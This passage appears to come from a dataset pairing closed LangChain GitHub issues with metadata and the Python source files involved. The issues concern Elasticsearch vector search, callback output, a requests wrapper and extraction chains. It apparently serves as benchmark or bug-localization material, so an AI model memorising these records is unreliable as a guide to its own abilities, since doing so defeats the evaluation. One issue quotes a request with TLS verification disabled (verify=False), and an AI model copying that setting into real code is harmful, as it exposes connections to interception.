"`set_cache_and_teardown` always sets the cache."
)
def create_llm_string(llm: Union[BaseLLM, BaseChatModel]) -> str:
_dict: Dict = llm.dict()
_dict["stop"] = None
return str(sorted([(k, v) for k, v in _dict.items()]))
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 6,198 | Elasticsearch : ElasticKnnSearch.from_texts throws AttributeError | ### System Info
Langchain version : 0.0.199
Python Version: Python 3.9.16
MacOS
@CodeDevNinja @dev2049
PR https://github.com/hwchase17/langchain/pull/5058 introduced a change to ElasticVectorSearch from_texts which broke, kind of coincidentally, ElasticKnnSearch from_texts
I discovered this issue when running docs/modules/indexes/vectorstores/examples/elasticsearch.ipynb . I got to the following cell:
```python
# Test `add_texts` method
texts = ["Hello, world!", "Machine learning is fun.", "I love Python."]
knn_search.add_texts(texts)
# Test `from_texts` method
new_texts = ["This is a new text.", "Elasticsearch is powerful.", "Python is great for data analysis."]
knn_search.from_texts(new_texts, embeddings, elasticsearch_url=elasticsearch_url)
```
and it said:
```python
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
Cell In[10], line 7
5 # Test `from_texts` method
6 new_texts = ["This is a new text.", "Elasticsearch is powerful.", "Python is great for data analysis."]
----> 7 knn_search.from_texts(new_texts, embeddings, elasticsearch_url=elasticsearch_url)
File ~/dev/github/langchain/langchain/vectorstores/elastic_vector_search.py:296, in ElasticVectorSearch.from_texts(cls, texts, embedding, metadatas, elasticsearch_url, index_name, refresh_indices, **kwargs)
293 index_name = index_name or uuid.uuid4().hex
294 vectorsearch = cls(
295 elasticsearch_url, index_name, embedding, **kwargs)
--> 296 vectorsearch.add_texts(
297 texts, metadatas=metadatas, refresh_indices=refresh_indices
298 )
299 return vectorsearch
File ~/dev/github/langchain/langchain/vectorstores/elastic_vector_search.py:183, in ElasticVectorSearch.add_texts(self, texts, metadatas, refresh_indices, **kwargs)
181 requests = []
182 ids = []
--> 183 embeddings = self.embedding.embed_documents(list(texts))
184 dim = len(embeddings[0])
185 mapping = _default_text_mapping(dim)
AttributeError: 'str' object has no attribute 'embed_documents'
```
which is a pretty weird error.
This is because https://github.com/cdiddy77/langchain/blob/e74733ab9e5e307fd828ea600ea929a1cb24320f/langchain/vectorstores/elastic_vector_search.py#L294 invokes the __init__ of the calling class, in this case `ElasticKnnSearch` which takes parameters in a very different order.
This calling of the wrong __init__ was always present, but the PR above added a subsequent called to add_texts, which is where the bogus embedding is referenced, causing the exception.
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to repro:
1. Open docs/modules/indexes/vectorstores/examples/elasticsearch.ipynb
2. Modify as appropriate with elasticsearch_url, and further down, model_id, dims, cloud_id, username,password of elastic cloud deployment
3. Run until cell below "Test adding vectors"
### Expected behavior
Not throw exception | https://github.com/langchain-ai/langchain/issues/6198 | https://github.com/langchain-ai/langchain/pull/6199 | 854f3fe9b1ca1c3e097cb0ccd55d1406e9c04406 | 574698a5fb2adbc4b6eb20ffe11a949a4f3b0371 | "2023-06-15T04:45:12Z" | python | "2023-07-13T23:55:20Z" | langchain/vectorstores/elastic_vector_search.py | """Wrapper around Elasticsearch vector database."""
from __future__ import annotations
import uuid
from abc import ABC
from typing import (
TYPE_CHECKING,
Any,
Dict,
Iterable,
List,
Mapping,
Optional,
Tuple,
Union,
)
from langchain.docstore.document import Document
from langchain.embeddings.base import Embeddings
from langchain.utils import get_from_env
from langchain.vectorstores.base import VectorStore
if TYPE_CHECKING:
from elasticsearch import Elasticsearch
def _default_text_mapping(dim: int) -> Dict:
return {
"properties": {
"text": {"type": "text"},
"vector": {"type": "dense_vector", "dims": dim},
}
}
def _default_script_query(query_vector: List[float], filter: Optional[dict]) -> Dict:
if filter:
((key, value),) = filter.items()
filter = {"match": {f"metadata.{key}.keyword": f"{value}"}}
else:
filter = {"match_all": {}}
return {
"script_score": {
"query": filter,
"script": {
"source": "cosineSimilarity(params.query_vector, 'vector') + 1.0",
"params": {"query_vector": query_vector},
},
}
}
# ElasticVectorSearch is a concrete implementation of the abstract base class
# VectorStore, which defines a common interface for all vector database
# implementations. By inheriting from the ABC class, ElasticVectorSearch can be
# defined as an abstract base class itself, allowing the creation of subclasses with
# their own specific implementations. If you plan to subclass ElasticVectorSearch,
# you can inherit from it and define your own implementation of the necessary methods
# and attributes.
class ElasticVectorSearch(VectorStore, ABC):
"""Wrapper around Elasticsearch as a vector database.
To connect to an Elasticsearch instance that does not require
login credentials, pass the Elasticsearch URL and index name along with the
embedding object to the constructor.
Example:
.. code-block:: python
from langchain import ElasticVectorSearch
from langchain.embeddings import OpenAIEmbeddings
embedding = OpenAIEmbeddings()
elastic_vector_search = ElasticVectorSearch(
elasticsearch_url="http://localhost:9200",
index_name="test_index",
embedding=embedding
)
To connect to an Elasticsearch instance that requires login credentials,
including Elastic Cloud, use the Elasticsearch URL format
https://username:password@es_host:9243. For example, to connect to Elastic
Cloud, create the Elasticsearch URL with the required authentication details and
pass it to the ElasticVectorSearch constructor as the named parameter
elasticsearch_url.
You can obtain your Elastic Cloud URL and login credentials by logging in to the
Elastic Cloud console at https://cloud.elastic.co, selecting your deployment, and
navigating to the "Deployments" page.
To obtain your Elastic Cloud password for the default "elastic" user:
1. Log in to the Elastic Cloud console at https://cloud.elastic.co
2. Go to "Security" > "Users"
3. Locate the "elastic" user and click "Edit"
4. Click "Reset password"
5. Follow the prompts to reset the password
The format for Elastic Cloud URLs is
https://username:password@cluster_id.region_id.gcp.cloud.es.io:9243.
Example:
.. code-block:: python
from langchain import ElasticVectorSearch
from langchain.embeddings import OpenAIEmbeddings
embedding = OpenAIEmbeddings()
elastic_host = "cluster_id.region_id.gcp.cloud.es.io"
elasticsearch_url = f"https://username:password@{elastic_host}:9243"
elastic_vector_search = ElasticVectorSearch(
elasticsearch_url=elasticsearch_url,
index_name="test_index",
embedding=embedding
)
Args:
elasticsearch_url (str): The URL for the Elasticsearch instance.
index_name (str): The name of the Elasticsearch index for the embeddings.
embedding (Embeddings): An object that provides the ability to embed text.
It should be an instance of a class that subclasses the Embeddings
abstract base class, such as OpenAIEmbeddings()
Raises:
ValueError: If the elasticsearch python package is not installed.
"""
def __init__(
self,
elasticsearch_url: str,
index_name: str,
embedding: Embeddings,
*,
ssl_verify: Optional[Dict[str, Any]] = None,
):
"""Initialize with necessary components."""
try:
import elasticsearch
except ImportError:
raise ImportError(
"Could not import elasticsearch python package. "
"Please install it with `pip install elasticsearch`."
)
self.embedding = embedding
self.index_name = index_name
_ssl_verify = ssl_verify or {}
try:
self.client = elasticsearch.Elasticsearch(elasticsearch_url, **_ssl_verify)
except ValueError as e:
raise ValueError(
f"Your elasticsearch client string is mis-formatted. Got error: {e} "
)
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
refresh_indices: bool = True,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
ids: Optional list of unique IDs.
refresh_indices: bool to refresh ElasticSearch indices
Returns:
List of ids from adding the texts into the vectorstore.
"""
try:
from elasticsearch.exceptions import NotFoundError
from elasticsearch.helpers import bulk
except ImportError:
raise ImportError(
"Could not import elasticsearch python package. "
"Please install it with `pip install elasticsearch`."
)
requests = []
ids = ids or [str(uuid.uuid4()) for _ in texts]
embeddings = self.embedding.embed_documents(list(texts))
dim = len(embeddings[0])
mapping = _default_text_mapping(dim)
# check to see if the index already exists
try:
self.client.indices.get(index=self.index_name)
except NotFoundError:
# TODO would be nice to create index before embedding,
# just to save expensive steps for last
self.create_index(self.client, self.index_name, mapping)
for i, text in enumerate(texts):
metadata = metadatas[i] if metadatas else {}
request = {
"_op_type": "index",
"_index": self.index_name,
"vector": embeddings[i],
"text": text,
"metadata": metadata,
"_id": ids[i],
}
requests.append(request)
bulk(self.client, requests)
if refresh_indices:
self.client.indices.refresh(index=self.index_name)
return ids
def similarity_search(
self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any
) -> List[Document]:
"""Return docs most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
Returns:
List of Documents most similar to the query.
"""
docs_and_scores = self.similarity_search_with_score(query, k, filter=filter)
documents = [d[0] for d in docs_and_scores]
return documents
def similarity_search_with_score(
self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any
) -> List[Tuple[Document, float]]:
"""Return docs most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
Returns:
List of Documents most similar to the query.
"""
embedding = self.embedding.embed_query(query)
script_query = _default_script_query(embedding, filter)
response = self.client_search(
self.client, self.index_name, script_query, size=k
)
hits = [hit for hit in response["hits"]["hits"]]
docs_and_scores = [
(
Document(
page_content=hit["_source"]["text"],
metadata=hit["_source"]["metadata"],
),
hit["_score"],
)
for hit in hits
]
return docs_and_scores
@classmethod
def from_texts(
cls,
texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
elasticsearch_url: Optional[str] = None,
index_name: Optional[str] = None,
refresh_indices: bool = True,
**kwargs: Any,
) -> ElasticVectorSearch:
"""Construct ElasticVectorSearch wrapper from raw documents.
This is a user-friendly interface that:
1. Embeds documents.
2. Creates a new index for the embeddings in the Elasticsearch instance.
3. Adds the documents to the newly created Elasticsearch index.
This is intended to be a quick way to get started.
Example:
.. code-block:: python
from langchain import ElasticVectorSearch
from langchain.embeddings import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
elastic_vector_search = ElasticVectorSearch.from_texts(
texts,
embeddings,
elasticsearch_url="http://localhost:9200"
)
"""
elasticsearch_url = elasticsearch_url or get_from_env(
"elasticsearch_url", "ELASTICSEARCH_URL"
)
index_name = index_name or uuid.uuid4().hex
vectorsearch = cls(elasticsearch_url, index_name, embedding, **kwargs)
vectorsearch.add_texts(
texts, metadatas=metadatas, ids=ids, refresh_indices=refresh_indices
)
return vectorsearch
def create_index(self, client: Any, index_name: str, mapping: Dict) -> None:
version_num = client.info()["version"]["number"][0]
version_num = int(version_num)
if version_num >= 8:
client.indices.create(index=index_name, mappings=mapping)
else:
client.indices.create(index=index_name, body={"mappings": mapping})
def client_search(
self, client: Any, index_name: str, script_query: Dict, size: int
) -> Any:
version_num = client.info()["version"]["number"][0]
version_num = int(version_num)
if version_num >= 8:
response = client.search(index=index_name, query=script_query, size=size)
else:
response = client.search(
index=index_name, body={"query": script_query, "size": size}
)
return response
def delete(self, ids: Optional[List[str]] = None, **kwargs: Any) -> None:
"""Delete by vector IDs.
Args:
ids: List of ids to delete.
"""
if ids is None:
raise ValueError("No ids provided to delete.")
# TODO: Check if this can be done in bulk
for id in ids:
self.client.delete(index=self.index_name, id=id)
class ElasticKnnSearch(ElasticVectorSearch):
"""
A class for performing k-Nearest Neighbors (k-NN) search on an Elasticsearch index.
The class is designed for a text search scenario where documents are text strings
and their embeddings are vector representations of those strings.
"""
def __init__(
self,
index_name: str,
embedding: Embeddings,
es_connection: Optional["Elasticsearch"] = None,
es_cloud_id: Optional[str] = None,
es_user: Optional[str] = None,
es_password: Optional[str] = None,
vector_query_field: Optional[str] = "vector",
query_field: Optional[str] = "text",
):
"""
Initializes an instance of the ElasticKnnSearch class and sets up the
Elasticsearch client.
Args:
index_name: The name of the Elasticsearch index.
embedding: An instance of the Embeddings class, used to generate vector
representations of text strings.
es_connection: An existing Elasticsearch connection.
es_cloud_id: The Cloud ID of the Elasticsearch instance. Required if
creating a new connection.
es_user: The username for the Elasticsearch instance. Required if
creating a new connection.
es_password: The password for the Elasticsearch instance. Required if
creating a new connection.
"""
try:
import elasticsearch
except ImportError:
raise ImportError(
"Could not import elasticsearch python package. "
"Please install it with `pip install elasticsearch`."
)
self.embedding = embedding
self.index_name = index_name
self.query_field = query_field
self.vector_query_field = vector_query_field
# If a pre-existing Elasticsearch connection is provided, use it.
if es_connection is not None:
self.client = es_connection
else:
# If credentials for a new Elasticsearch connection are provided,
# create a new connection.
if es_cloud_id and es_user and es_password:
self.client = elasticsearch.Elasticsearch(
cloud_id=es_cloud_id, basic_auth=(es_user, es_password)
)
else:
raise ValueError(
"""Either provide a pre-existing Elasticsearch connection, \
or valid credentials for creating a new connection."""
)
@staticmethod
def _default_knn_mapping(dims: int) -> Dict:
"""Generates a default index mapping for kNN search."""
return {
"properties": {
"text": {"type": "text"},
"vector": {
"type": "dense_vector",
"dims": dims,
"index": True,
"similarity": "dot_product",
},
}
}
def _default_knn_query(
self,
query_vector: Optional[List[float]] = None,
query: Optional[str] = None,
model_id: Optional[str] = None,
k: Optional[int] = 10,
num_candidates: Optional[int] = 10,
) -> Dict:
knn: Dict = {
"field": self.vector_query_field,
"k": k,
"num_candidates": num_candidates,
}
# Case 1: `query_vector` is provided, but not `model_id` -> use query_vector
if query_vector and not model_id:
knn["query_vector"] = query_vector
# Case 2: `query` and `model_id` are provided, -> use query_vector_builder
elif query and model_id:
knn["query_vector_builder"] = {
"text_embedding": {
"model_id": model_id, # use 'model_id' argument
"model_text": query, # use 'query' argument
}
}
else:
raise ValueError(
"Either `query_vector` or `model_id` must be provided, but not both."
)
return knn
def knn_search(
self,
query: Optional[str] = None,
k: Optional[int] = 10,
query_vector: Optional[List[float]] = None,
model_id: Optional[str] = None,
size: Optional[int] = 10,
source: Optional[bool] = True,
fields: Optional[
Union[List[Mapping[str, Any]], Tuple[Mapping[str, Any], ...], None]
] = None,
) -> Dict:
"""
Performs a k-nearest neighbor (k-NN) search on the Elasticsearch index.
The search can be conducted using either a raw query vector or a model ID.
The method first generates
the body of the search query, which can be interpreted by Elasticsearch.
It then performs the k-NN
search on the Elasticsearch index and returns the results.
Args:
query: The query or queries to be used for the search. Required if
`query_vector` is not provided.
k: The number of nearest neighbors to return. Defaults to 10.
query_vector: The query vector to be used for the search. Required if
`query` is not provided.
model_id: The ID of the model to use for generating the query vector, if
`query` is provided.
size: The number of search hits to return. Defaults to 10.
source: Whether to include the source of each hit in the results.
fields: The fields to include in the source of each hit. If None, all
fields are included.
vector_query_field: Field name to use in knn search if not default 'vector'
Returns:
The search results.
Raises:
ValueError: If neither `query_vector` nor `model_id` is provided, or if
both are provided.
"""
knn_query_body = self._default_knn_query(
query_vector=query_vector, query=query, model_id=model_id, k=k
)
# Perform the kNN search on the Elasticsearch index and return the results.
res = self.client.search(
index=self.index_name,
knn=knn_query_body,
size=size,
source=source,
fields=fields,
)
return dict(res)
def knn_hybrid_search(
self,
query: Optional[str] = None,
k: Optional[int] = 10,
query_vector: Optional[List[float]] = None,
model_id: Optional[str] = None,
size: Optional[int] = 10,
source: Optional[bool] = True,
knn_boost: Optional[float] = 0.9,
query_boost: Optional[float] = 0.1,
fields: Optional[
Union[List[Mapping[str, Any]], Tuple[Mapping[str, Any], ...], None]
] = None,
) -> Dict[Any, Any]:
"""Performs a hybrid k-nearest neighbor (k-NN) and text-based search on the
Elasticsearch index.
The search can be conducted using either a raw query vector or a model ID.
The method first generates
the body of the k-NN search query and the text-based query, which can be
interpreted by Elasticsearch.
It then performs the hybrid search on the Elasticsearch index and returns the
results.
Args:
query: The query or queries to be used for the search. Required if
`query_vector` is not provided.
k: The number of nearest neighbors to return. Defaults to 10.
query_vector: The query vector to be used for the search. Required if
`query` is not provided.
model_id: The ID of the model to use for generating the query vector, if
`query` is provided.
size: The number of search hits to return. Defaults to 10.
source: Whether to include the source of each hit in the results.
knn_boost: The boost factor for the k-NN part of the search.
query_boost: The boost factor for the text-based part of the search.
fields
The fields to include in the source of each hit. If None, all fields are
included. Defaults to None.
vector_query_field: Field name to use in knn search if not default 'vector'
query_field: Field name to use in search if not default 'text'
Returns:
The search results.
Raises:
ValueError: If neither `query_vector` nor `model_id` is provided, or if
both are provided.
"""
knn_query_body = self._default_knn_query(
query_vector=query_vector, query=query, model_id=model_id, k=k
)
# Modify the knn_query_body to add a "boost" parameter
knn_query_body["boost"] = knn_boost
# Generate the body of the standard Elasticsearch query
match_query_body = {
"match": {self.query_field: {"query": query, "boost": query_boost}}
}
# Perform the hybrid search on the Elasticsearch index and return the results.
res = self.client.search(
index=self.index_name,
query=match_query_body,
knn=knn_query_body,
fields=fields,
size=size,
source=source,
)
return dict(res)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,524 | Specific name of the current chain is not displayed | ### System Info
LangChain v0.0.229, Python v3.10.12, Ubuntu 20.04.2 LTS
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
I am encountering an issue where the specific name of the current chain is not being displayed in the console output, even though I have set 'verbose=True' in the MultiPromptChain and other Chains. When the program enters a new chain, it only prints 'Entering new chain...' without specifying the name of the chain. This makes it difficult to debug and understand which chain is currently being used. Could you please look into this issue and provide a way to display the name of the current chain in the console output? Thank you.
The output could be
```
> Entering new chain...
> Entering new chain...
lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain.
warnings.warn(
> Finished chain.
math: {'input': 'What is the derivative of a function?'}
> Entering new chain...
Prompt after formatting:
You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question.
Here is a question:
What is the derivative of a function?
> Finished chain.
> Finished chain.
```
### Expected behavior
```
> Entering new MultiPromptChain chain...
> Entering new LLMRouterChain chain...
lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain.
warnings.warn(
> Finished chain.
math: {'input': 'What is the derivative of a function?'}
> Entering new LLMChain[math] chain...
Prompt after formatting:
You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question.
Here is a question:
What is the derivative of a function?
> Finished chain.
> Finished chain.
``` | https://github.com/langchain-ai/langchain/issues/7524 | https://github.com/langchain-ai/langchain/pull/7687 | 3874bb256e09d377032ae54b1592ca3dd7cf9e4d | af6d333147db0af7d558a4a66d6c2752b6027204 | "2023-07-11T08:28:40Z" | python | "2023-07-14T02:39:21Z" | langchain/callbacks/file.py | """Callback Handler that writes to a file."""
from typing import Any, Dict, Optional, TextIO, cast
from langchain.callbacks.base import BaseCallbackHandler
from langchain.input import print_text
from langchain.schema import AgentAction, AgentFinish
class FileCallbackHandler(BaseCallbackHandler):
"""Callback Handler that writes to a file."""
def __init__(
self, filename: str, mode: str = "a", color: Optional[str] = None
) -> None:
"""Initialize callback handler."""
self.file = cast(TextIO, open(filename, mode))
self.color = color
def __del__(self) -> None:
"""Destructor to cleanup when done."""
self.file.close()
def on_chain_start(
self, serialized: Dict[str, Any], inputs: Dict[str, Any], **kwargs: Any
) -> None:
"""Print out that we are entering a chain."""
class_name = serialized["name"]
print_text(
f"\n\n\033[1m> Entering new {class_name} chain...\033[0m",
end="\n",
file=self.file,
)
def on_chain_end(self, outputs: Dict[str, Any], **kwargs: Any) -> None:
"""Print out that we finished a chain."""
print_text("\n\033[1m> Finished chain.\033[0m", end="\n", file=self.file)
def on_agent_action(
self, action: AgentAction, color: Optional[str] = None, **kwargs: Any
) -> Any:
"""Run on agent action."""
print_text(action.log, color=color or self.color, file=self.file)
def on_tool_end(
self,
output: str,
color: Optional[str] = None,
observation_prefix: Optional[str] = None,
llm_prefix: Optional[str] = None,
**kwargs: Any,
) -> None:
"""If not the final action, print out observation."""
if observation_prefix is not None:
print_text(f"\n{observation_prefix}", file=self.file)
print_text(output, color=color or self.color, file=self.file)
if llm_prefix is not None:
print_text(f"\n{llm_prefix}", file=self.file)
def on_text(
self, text: str, color: Optional[str] = None, end: str = "", **kwargs: Any
) -> None:
"""Run when agent ends."""
print_text(text, color=color or self.color, end=end, file=self.file)
def on_agent_finish(
self, finish: AgentFinish, color: Optional[str] = None, **kwargs: Any
) -> None:
"""Run on agent end."""
print_text(finish.log, color=color or self.color, end="\n", file=self.file)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,542 | Issue: Passing auth object to LLMRequestsChain | ### Issue you'd like to raise.
Accessing many corporate resources requires special authentication, e.g. Kerberos.
The `requests` library supports passing an auth object, e.g.
`requests.get(url, auth=HttpNegotiateAuth(), verify=False)` to use SSPI.
We're able to pass a `requests_wrapper `to `LLMRequestsChain`, but it only allows changing headers, not the actual get method that is used.
### Suggestion:
Allow for more generic generic wrappers to be passed? Allow passing a requests-compatible auth object? | https://github.com/langchain-ai/langchain/issues/7542 | https://github.com/langchain-ai/langchain/pull/7701 | 1e40427755f3034c5c411c1d0a921cdb3e13849d | 663b0933e488383e6a9bc2a04b4b1cf866a8ea94 | "2023-07-11T13:59:38Z" | python | "2023-07-14T12:38:24Z" | langchain/requests.py | """Lightweight wrapper around requests library, with async support."""
from contextlib import asynccontextmanager
from typing import Any, AsyncGenerator, Dict, Optional
import aiohttp
import requests
from pydantic import BaseModel, Extra
class Requests(BaseModel):
"""Wrapper around requests to handle auth and async.
The main purpose of this wrapper is to handle authentication (by saving
headers) and enable easy async methods on the same base object.
"""
headers: Optional[Dict[str, str]] = None
aiosession: Optional[aiohttp.ClientSession] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
def get(self, url: str, **kwargs: Any) -> requests.Response:
"""GET the URL and return the text."""
return requests.get(url, headers=self.headers, **kwargs)
def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""POST to the URL and return the text."""
return requests.post(url, json=data, headers=self.headers, **kwargs)
def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""PATCH the URL and return the text."""
return requests.patch(url, json=data, headers=self.headers, **kwargs)
def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""PUT the URL and return the text."""
return requests.put(url, json=data, headers=self.headers, **kwargs)
def delete(self, url: str, **kwargs: Any) -> requests.Response:
"""DELETE the URL and return the text."""
return requests.delete(url, headers=self.headers, **kwargs)
@asynccontextmanager
async def _arequest(
self, method: str, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""Make an async request."""
if not self.aiosession:
async with aiohttp.ClientSession() as session:
async with session.request(
method, url, headers=self.headers, **kwargs
) as response:
yield response
else:
async with self.aiosession.request(
method, url, headers=self.headers, **kwargs
) as response:
yield response
@asynccontextmanager
async def aget(
self, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""GET the URL and return the text asynchronously."""
async with self._arequest("GET", url, **kwargs) as response:
yield response
@asynccontextmanager
async def apost(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""POST to the URL and return the text asynchronously."""
async with self._arequest("POST", url, json=data, **kwargs) as response:
yield response
@asynccontextmanager
async def apatch(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""PATCH the URL and return the text asynchronously."""
async with self._arequest("PATCH", url, json=data, **kwargs) as response:
yield response
@asynccontextmanager
async def aput(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""PUT the URL and return the text asynchronously."""
async with self._arequest("PUT", url, json=data, **kwargs) as response:
yield response
@asynccontextmanager
async def adelete(
self, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""DELETE the URL and return the text asynchronously."""
async with self._arequest("DELETE", url, **kwargs) as response:
yield response
class TextRequestsWrapper(BaseModel):
"""Lightweight wrapper around requests library.
The main purpose of this wrapper is to always return a text output.
"""
headers: Optional[Dict[str, str]] = None
aiosession: Optional[aiohttp.ClientSession] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@property
def requests(self) -> Requests:
return Requests(headers=self.headers, aiosession=self.aiosession)
def get(self, url: str, **kwargs: Any) -> str:
"""GET the URL and return the text."""
return self.requests.get(url, **kwargs).text
def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""POST to the URL and return the text."""
return self.requests.post(url, data, **kwargs).text
def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PATCH the URL and return the text."""
return self.requests.patch(url, data, **kwargs).text
def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PUT the URL and return the text."""
return self.requests.put(url, data, **kwargs).text
def delete(self, url: str, **kwargs: Any) -> str:
"""DELETE the URL and return the text."""
return self.requests.delete(url, **kwargs).text
async def aget(self, url: str, **kwargs: Any) -> str:
"""GET the URL and return the text asynchronously."""
async with self.requests.aget(url, **kwargs) as response:
return await response.text()
async def apost(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""POST to the URL and return the text asynchronously."""
async with self.requests.apost(url, data, **kwargs) as response:
return await response.text()
async def apatch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PATCH the URL and return the text asynchronously."""
async with self.requests.apatch(url, data, **kwargs) as response:
return await response.text()
async def aput(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PUT the URL and return the text asynchronously."""
async with self.requests.aput(url, data, **kwargs) as response:
return await response.text()
async def adelete(self, url: str, **kwargs: Any) -> str:
"""DELETE the URL and return the text asynchronously."""
async with self.requests.adelete(url, **kwargs) as response:
return await response.text()
# For backwards compatibility
RequestsWrapper = TextRequestsWrapper
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,982 | TypeError: create_extraction_chain() got an unexpected keyword argument 'verbose' | ### Feature request
Almost all the chains offered in langchain framework support Verbose option which helps the developers understand what prompt is being applied under the hood and plan their work accordingly. It immensely help while debugging. create_extraction_chain is a very helpful one and I found this is not accepting verbose attribute.
### Motivation
For many developers who are just following the langchain official documentation and not looking at the code used under the hood, this error will sound odd. Supporting this attribute will help in keeping things consistent and improve debugging feature of this chain
### Your contribution
I can raise the PR for this
![Screenshot 2023-07-20 at 12 34 55 PM](https://github.com/hwchase17/langchain/assets/8801972/18b248df-1a7c-49cf-a9b1-3101e6928631)
| https://github.com/langchain-ai/langchain/issues/7982 | https://github.com/langchain-ai/langchain/pull/7984 | 812a1643db9daac573f77f7cdbce3fea90ba0507 | d6493590da3977b5077c13ff3aaad591f71637d6 | "2023-07-20T06:39:12Z" | python | "2023-07-20T13:52:13Z" | langchain/chains/openai_functions/extraction.py | from typing import Any, List
from pydantic import BaseModel
from langchain.chains.base import Chain
from langchain.chains.llm import LLMChain
from langchain.chains.openai_functions.utils import (
_convert_schema,
_resolve_schema_references,
get_llm_kwargs,
)
from langchain.output_parsers.openai_functions import (
JsonKeyOutputFunctionsParser,
PydanticAttrOutputFunctionsParser,
)
from langchain.prompts import ChatPromptTemplate
from langchain.schema.language_model import BaseLanguageModel
def _get_extraction_function(entity_schema: dict) -> dict:
return {
"name": "information_extraction",
"description": "Extracts the relevant information from the passage.",
"parameters": {
"type": "object",
"properties": {
"info": {"type": "array", "items": _convert_schema(entity_schema)}
},
"required": ["info"],
},
}
_EXTRACTION_TEMPLATE = """Extract and save the relevant entities mentioned\
in the following passage together with their properties.
Only extract the properties mentioned in the 'information_extraction' function.
If a property is not present and is not required in the function parameters, do not include it in the output.
Passage:
{input}
""" # noqa: E501
def create_extraction_chain(schema: dict, llm: BaseLanguageModel) -> Chain:
"""Creates a chain that extracts information from a passage.
Args:
schema: The schema of the entities to extract.
llm: The language model to use.
Returns:
Chain that can be used to extract information from a passage.
"""
function = _get_extraction_function(schema)
prompt = ChatPromptTemplate.from_template(_EXTRACTION_TEMPLATE)
output_parser = JsonKeyOutputFunctionsParser(key_name="info")
llm_kwargs = get_llm_kwargs(function)
chain = LLMChain(
llm=llm,
prompt=prompt,
llm_kwargs=llm_kwargs,
output_parser=output_parser,
)
return chain
def create_extraction_chain_pydantic(
pydantic_schema: Any, llm: BaseLanguageModel
) -> Chain:
"""Creates a chain that extracts information from a passage using pydantic schema.
Args:
pydantic_schema: The pydantic schema of the entities to extract.
llm: The language model to use.
Returns:
Chain that can be used to extract information from a passage.
"""
class PydanticSchema(BaseModel):
info: List[pydantic_schema] # type: ignore
openai_schema = pydantic_schema.schema()
openai_schema = _resolve_schema_references(
openai_schema, openai_schema.get("definitions", {})
)
function = _get_extraction_function(openai_schema)
prompt = ChatPromptTemplate.from_template(_EXTRACTION_TEMPLATE)
output_parser = PydanticAttrOutputFunctionsParser(
pydantic_schema=PydanticSchema, attr_name="info"
)
llm_kwargs = get_llm_kwargs(function)
chain = LLMChain(
llm=llm,
prompt=prompt,
llm_kwargs=llm_kwargs,
output_parser=output_parser,
)
return chain
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 6,462 | AzureChatOpenAI Streaming causes IndexError: list index out of range | ### System Info
langchain-0.0.205-py3, macos ventura, python 3.11
### Who can help?
@hwchase17 / @agola11
### Information
- [x] The official example notebooks/scripts
